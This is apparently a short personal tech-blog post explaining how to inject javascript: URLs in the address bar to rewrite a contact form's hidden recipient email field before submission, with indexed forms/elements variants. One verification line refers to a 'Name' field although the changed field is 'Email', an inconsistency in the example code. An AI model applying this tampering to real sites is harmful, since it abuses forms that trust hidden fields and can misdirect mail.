JavaScript codes can be injected in the address bars of web browsers to edit online forms before submitting them, bellow I am posting an example for archiving purposes.

Assuming the page has a contact form, where submitted data is sent to an email address included in a hidden HTML input tag as in the following code:

<form name="ContactForm" action="submit.php" method="post">
<input type="hidden" name="Email" value="admin@website.com" />

To change the email address to: myemail@hotmail.com, the following code can be injected:

javascript:void(document.ContactForm.Email.value="myemail@hotmail.com");

Where ContactForm is the name of the form and Email is the name of the input tag.

To check that the value has actually been changed, view it with:

javascript:alert(document.ContactForm.Name.value);

If the form has no name, check the form order in the page, if it is the first, you may refer to it using: forms[0]. Same thing applies to the input tag, you may refer to it using: elements[0].

This way, assuming the form is the first, and the order of the input tag in that form is 4, our codes will be:

javascript:void(document.forms[0].elements[3].value="myemail@hotmail.com");

and

javascript:alert(document.forms[0].elements[3].value);

One Response to “JavaScript Injection (Form Editing)”

Leave a Reply

*

Haider’s WebSpace
Welcome to my technical blog. This is where I write, archive and share computer related articles. Subjects vary from posting technical solutions to researching particular topics. Feel free to comment and talk IT!
Sponsored Links
My Tweets